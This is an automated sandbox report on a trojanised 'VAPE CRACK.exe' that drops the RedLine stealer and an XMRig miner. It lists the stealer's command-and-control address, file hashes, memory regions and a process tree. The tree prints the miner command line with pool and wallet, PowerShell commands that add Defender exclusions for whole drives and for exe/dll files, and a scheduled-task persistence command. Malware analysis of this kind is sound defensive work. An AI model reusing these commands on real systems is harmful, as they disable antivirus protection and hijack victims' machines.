Analysis
-
max time kernel
146s -
max time network
131s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
23-10-2021 17:24
General
-
Target
VAPE CRACK.exe
-
Size
7.3MB
-
MD5
c884991c01d2854cd2d9b46f792207fc
-
SHA1
3f1549e8aaea2119361caa588d47de42aab0dc47
-
SHA256
914644da1b2f5c041a3199411b353f3c8e5b7e965399ac015bbc6c5286da7a7e
-
SHA512
0fade5bc588ea78f9dc589ca2c1223ae6141e6eae3af92a7d660f5343ebfb798b6de1c6011f52061ef2a2cc29800615420dbaaa68b7fac3f10b6a0a0a6da9669
Malware Config
Extracted
redline
@zenvolord
185.209.22.181:29234
Signatures
-
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
-
VMProtect packed file 4 IoCs
Detects executables packed with VMProtect commercial packer.
-
Drops startup file 1 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 46 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\VAPE CRACK.exe"C:\Users\Admin\AppData\Local\Temp\VAPE CRACK.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\dllhost.exe"C:\Users\Admin\AppData\Local\Temp\dllhost.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48VqBvWwx4DFvegwZp7dE7WpBeYWhdaZUF8BiWc6HdwsP89dK2tiqnHSuyyBjeSn9cZ2ZCMrVrVDkAhGNvCC44DKL2zvQn1 -p x -k -v=0 --donate-level=1 -t 13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\VAPE V4.exe"C:\Users\Admin\AppData\Local\Temp\VAPE V4.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\build.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"9⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 2563⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b027441058941c1c714e8666227bc20b
SHA160898f8a090874665582f28b0e4d770f7c2c3a83
SHA256a4a68fe0bbe94d1b5f0cc9ead3b054993c81afd1d29df6a721a60d1fd26b9f7e
SHA512ffbb4436e374956f70783755ac4bce1012298b8cb87dd978ce13bb8b199d5d7f42bad88f3508e9544800b4886a5106a1dfdc5fe005ed8f7e1bb405a70862157b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
8183d557c0b46a51d577de23e18e6e9d
SHA1e0600ae4a206a8fa996b01ce27f6f8b1101c40a2
SHA2569ef18faf5b4b836175832a2313e1b578d4c6e33dd45cea64402e8e81160b9f25
SHA512015573c64b4e4d0879293487245d7e27e650b29ba8450322481b9b1785caecad0d266d17553777fc0003d442e51f0ace82e967782cf35b37b6e71980bb982314
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f6fded2df48d9ecee37a97248497caf0
SHA17ecb42f918ec87ad9b74894d9cb2a59608db0b5e
SHA25690278f76751be2529d1bc5f5f35f98126b36bd49db743e76a94390d9f3bd84d6
SHA51257b02712ef240c3165df2d64be437a3f16f16e27f7e042d1dcab3b9978f6a652c1405d921ae7d9d0963e4a55889f21d22132bef61f88739839c464fd36fe9bb5
-
C:\Users\Admin\AppData\Local\Temp\VAPE V4.exeMD5
eda712f5cca6547e36d2937b9d89fad0
SHA1fb036b0995196539788ad0bcbce0bbb8d2db448e
SHA256860eabc945b4a99255e1bdbcfcc19a6ebf605612d809678ecd329e6f17c4f961
SHA5125ba2ea554cd25c2931a56bfdfd20da2c064c316841d5506178e44591fd67d356595a8a1d8243df753d2691de3e4e9b6bdeb6b979cbc72894f03c07b048aad6a7
-
C:\Users\Admin\AppData\Local\Temp\VAPE V4.exeMD5
eda712f5cca6547e36d2937b9d89fad0
SHA1fb036b0995196539788ad0bcbce0bbb8d2db448e
SHA256860eabc945b4a99255e1bdbcfcc19a6ebf605612d809678ecd329e6f17c4f961
SHA5125ba2ea554cd25c2931a56bfdfd20da2c064c316841d5506178e44591fd67d356595a8a1d8243df753d2691de3e4e9b6bdeb6b979cbc72894f03c07b048aad6a7
-
C:\Users\Admin\AppData\Local\Temp\build.exeMD5
8a47854bb6f71ea75accdb2efebfebdd
SHA1948db24310675c45c664216ba7ee298481581eba
SHA256f3034e2160cda9c5a335a07016f8bc3172c0081a9f56c6199f3aff8c98bcbba4
SHA5128f24085692d391f7cff49e3cdc4ec053ac9db1c7548d7ace689b4d819167438c4171307b0f8eea97fd79e92fe24584731375a02f73f6dc4793d8044717e59def
-
C:\Users\Admin\AppData\Local\Temp\build.exeMD5
8a47854bb6f71ea75accdb2efebfebdd
SHA1948db24310675c45c664216ba7ee298481581eba
SHA256f3034e2160cda9c5a335a07016f8bc3172c0081a9f56c6199f3aff8c98bcbba4
SHA5128f24085692d391f7cff49e3cdc4ec053ac9db1c7548d7ace689b4d819167438c4171307b0f8eea97fd79e92fe24584731375a02f73f6dc4793d8044717e59def
-
C:\Users\Admin\AppData\Local\Temp\dllhost.exeMD5
d3b312dc4459edae7159835bcd374b9f
SHA1c4005eeae71227993aa8ddb05ef0fb0816568c25
SHA2564b515944cfb60f4fa648b09cd4f2556c3d77c381189f5e85fd6b6d9e20a974fd
SHA512019b87178e7051970b9868e37343e25e8a5875356b1a7053fee9eb80ff707195d06b8eae35faba066edfc463628f3298368964ab19a49e81d43c7a7fb2b29786
-
C:\Users\Admin\AppData\Local\Temp\dllhost.exeMD5
d3b312dc4459edae7159835bcd374b9f
SHA1c4005eeae71227993aa8ddb05ef0fb0816568c25
SHA2564b515944cfb60f4fa648b09cd4f2556c3d77c381189f5e85fd6b6d9e20a974fd
SHA512019b87178e7051970b9868e37343e25e8a5875356b1a7053fee9eb80ff707195d06b8eae35faba066edfc463628f3298368964ab19a49e81d43c7a7fb2b29786
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
2377a426e5329ce23fb1567f4841931b
SHA13d82d8c29d942ebe46cfc15a387ae9270dfd4708
SHA256f939428602b60db8a97d7d2ad604c803487d6dfbbc9e760a4d948ad94c0e20d2
SHA5121a0159695452841c46d260f5d3711939ba0c7e22dbf4b3b783d0241ffd807e4de0feb3e00964b23e49f656dac9520a5cfd71a911bfa6be7ed470c53476a4db6d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
2377a426e5329ce23fb1567f4841931b
SHA13d82d8c29d942ebe46cfc15a387ae9270dfd4708
SHA256f939428602b60db8a97d7d2ad604c803487d6dfbbc9e760a4d948ad94c0e20d2
SHA5121a0159695452841c46d260f5d3711939ba0c7e22dbf4b3b783d0241ffd807e4de0feb3e00964b23e49f656dac9520a5cfd71a911bfa6be7ed470c53476a4db6d
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exeMD5
4eef3a16234b50ad80f46b0928ec125d
SHA11dfc138538234f09bec31bebc2645733f34cc166
SHA2569709fb3d2694cd95a4e1f26ec6ae491a6cec56cac5e69840e9ad876b1053ff5a
SHA512311e7476596fc282d3940a702fb08c9192cb163a77a910f8b39043e39849fa7b1e48de135dcec9871871e651a5f491f06dd193ed788eadd10c63ac6678246208
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exeMD5
4eef3a16234b50ad80f46b0928ec125d
SHA11dfc138538234f09bec31bebc2645733f34cc166
SHA2569709fb3d2694cd95a4e1f26ec6ae491a6cec56cac5e69840e9ad876b1053ff5a
SHA512311e7476596fc282d3940a702fb08c9192cb163a77a910f8b39043e39849fa7b1e48de135dcec9871871e651a5f491f06dd193ed788eadd10c63ac6678246208
-
C:\Users\Admin\services32.exeMD5
8a47854bb6f71ea75accdb2efebfebdd
SHA1948db24310675c45c664216ba7ee298481581eba
SHA256f3034e2160cda9c5a335a07016f8bc3172c0081a9f56c6199f3aff8c98bcbba4
SHA5128f24085692d391f7cff49e3cdc4ec053ac9db1c7548d7ace689b4d819167438c4171307b0f8eea97fd79e92fe24584731375a02f73f6dc4793d8044717e59def
-
C:\Users\Admin\services32.exeMD5
8a47854bb6f71ea75accdb2efebfebdd
SHA1948db24310675c45c664216ba7ee298481581eba
SHA256f3034e2160cda9c5a335a07016f8bc3172c0081a9f56c6199f3aff8c98bcbba4
SHA5128f24085692d391f7cff49e3cdc4ec053ac9db1c7548d7ace689b4d819167438c4171307b0f8eea97fd79e92fe24584731375a02f73f6dc4793d8044717e59def
-
memory/488-469-0x0000000000000000-mapping.dmp
-
memory/656-436-0x00007FFAAB050000-0x00007FFAAB052000-memory.dmpFilesize
8KB
-
memory/656-430-0x0000000000000000-mapping.dmp
-
memory/1216-143-0x0000000008AF0000-0x0000000008AF1000-memory.dmpFilesize
4KB
-
memory/1216-138-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/1216-142-0x00000000089C0000-0x00000000089C1000-memory.dmpFilesize
4KB
-
memory/1216-144-0x0000000008A20000-0x0000000008A21000-memory.dmpFilesize
4KB
-
memory/1216-145-0x0000000008930000-0x0000000008F36000-memory.dmpFilesize
6.0MB
-
memory/1216-146-0x0000000008A60000-0x0000000008A61000-memory.dmpFilesize
4KB
-
memory/1216-147-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/1216-135-0x0000000000569A5E-mapping.dmp
-
memory/1216-137-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/1216-136-0x00000000001A0000-0x00000000001A1000-memory.dmpFilesize
4KB
-
memory/1216-141-0x0000000008F40000-0x0000000008F41000-memory.dmpFilesize
4KB
-
memory/1216-130-0x0000000000550000-0x000000000056E000-memory.dmpFilesize
120KB
-
memory/1216-139-0x0000000000550000-0x0000000000551000-memory.dmpFilesize
4KB
-
memory/1216-157-0x0000000009A50000-0x0000000009A51000-memory.dmpFilesize
4KB
-
memory/1216-160-0x0000000008DE0000-0x0000000008DE1000-memory.dmpFilesize
4KB
-
memory/1216-163-0x0000000008EC0000-0x0000000008EC1000-memory.dmpFilesize
4KB
-
memory/1216-162-0x0000000009550000-0x0000000009551000-memory.dmpFilesize
4KB
-
memory/1236-557-0x0000000000000000-mapping.dmp
-
memory/1280-161-0x000001DD42C50000-0x000001DD42C70000-memory.dmpFilesize
128KB
-
memory/1280-425-0x000001DD44520000-0x000001DD44540000-memory.dmpFilesize
128KB
-
memory/1280-156-0x000001DD42C20000-0x000001DD42C40000-memory.dmpFilesize
128KB
-
memory/1280-153-0x0000000000000000-mapping.dmp
-
memory/1636-572-0x0000000000000000-mapping.dmp
-
memory/1784-450-0x0000000000000000-mapping.dmp
-
memory/1868-152-0x0000000005A00000-0x0000000005A01000-memory.dmpFilesize
4KB
-
memory/1868-151-0x0000000005C10000-0x0000000005C11000-memory.dmpFilesize
4KB
-
memory/1868-128-0x0000000000EB0000-0x0000000000EB1000-memory.dmpFilesize
4KB
-
memory/1868-115-0x0000000000000000-mapping.dmp
-
memory/2160-494-0x00000298EF258000-0x00000298EF259000-memory.dmpFilesize
4KB
-
memory/2160-633-0x0000021844CF0000-0x0000021844CF2000-memory.dmpFilesize
8KB
-
memory/2160-464-0x00000298EF250000-0x00000298EF252000-memory.dmpFilesize
8KB
-
memory/2160-465-0x00000298EF253000-0x00000298EF255000-memory.dmpFilesize
8KB
-
memory/2160-451-0x0000000000000000-mapping.dmp
-
memory/2160-472-0x00000298EF256000-0x00000298EF258000-memory.dmpFilesize
8KB
-
memory/2160-664-0x0000021844CF8000-0x0000021844CF9000-memory.dmpFilesize
4KB
-
memory/2160-654-0x0000021844CF6000-0x0000021844CF8000-memory.dmpFilesize
8KB
-
memory/2160-624-0x0000000000000000-mapping.dmp
-
memory/2160-635-0x0000021844CF3000-0x0000021844CF5000-memory.dmpFilesize
8KB
-
memory/2208-539-0x0000000000000000-mapping.dmp
-
memory/2316-460-0x0000000000000000-mapping.dmp
-
memory/2392-445-0x0000022864B00000-0x0000022864B0F000-memory.dmpFilesize
60KB
-
memory/2392-446-0x000002287F0D0000-0x000002287F0D2000-memory.dmpFilesize
8KB
-
memory/2392-447-0x000002287F0D3000-0x000002287F0D5000-memory.dmpFilesize
8KB
-
memory/2392-448-0x000002287F0D6000-0x000002287F0D7000-memory.dmpFilesize
4KB
-
memory/2568-497-0x0000000000000000-mapping.dmp
-
memory/2568-538-0x0000027EB5B08000-0x0000027EB5B09000-memory.dmpFilesize
4KB
-
memory/2568-517-0x0000027EB5B06000-0x0000027EB5B08000-memory.dmpFilesize
8KB
-
memory/2568-515-0x0000027EB5B03000-0x0000027EB5B05000-memory.dmpFilesize
8KB
-
memory/2568-513-0x0000027EB5B00000-0x0000027EB5B02000-memory.dmpFilesize
8KB
-
memory/2756-674-0x0000021DFEF00000-0x0000021DFEF02000-memory.dmpFilesize
8KB
-
memory/2756-666-0x0000021DFD460000-0x0000021DFD467000-memory.dmpFilesize
28KB
-
memory/2756-675-0x0000021DFEF03000-0x0000021DFEF05000-memory.dmpFilesize
8KB
-
memory/2756-542-0x0000000000000000-mapping.dmp
-
memory/2756-676-0x0000021DFEF06000-0x0000021DFEF07000-memory.dmpFilesize
4KB
-
memory/2952-621-0x000001533D768000-0x000001533D769000-memory.dmpFilesize
4KB
-
memory/2952-558-0x0000000000000000-mapping.dmp
-
memory/2952-581-0x000001533D760000-0x000001533D762000-memory.dmpFilesize
8KB
-
memory/2952-582-0x000001533D763000-0x000001533D765000-memory.dmpFilesize
8KB
-
memory/2952-613-0x000001533D766000-0x000001533D768000-memory.dmpFilesize
8KB
-
memory/3640-559-0x0000019D4DBE0000-0x0000019D4DBE2000-memory.dmpFilesize
8KB
-
memory/3640-561-0x0000019D4DBE6000-0x0000019D4DBE7000-memory.dmpFilesize
4KB
-
memory/3640-560-0x0000019D4DBE3000-0x0000019D4DBE5000-memory.dmpFilesize
8KB
-
memory/3684-123-0x0000000001410000-0x0000000001411000-memory.dmpFilesize
4KB
-
memory/3684-118-0x0000000000000000-mapping.dmp
-
memory/3684-121-0x00000000011E0000-0x00000000011E1000-memory.dmpFilesize
4KB
-
memory/3684-122-0x00000000011F0000-0x00000000011F1000-memory.dmpFilesize
4KB
-
memory/3684-124-0x0000000001430000-0x0000000001431000-memory.dmpFilesize
4KB
-
memory/3684-125-0x0000000001440000-0x0000000001441000-memory.dmpFilesize
4KB
-
memory/3684-126-0x0000000001450000-0x0000000001451000-memory.dmpFilesize
4KB
-
memory/3684-127-0x0000000000BB0000-0x0000000001042000-memory.dmpFilesize
4.6MB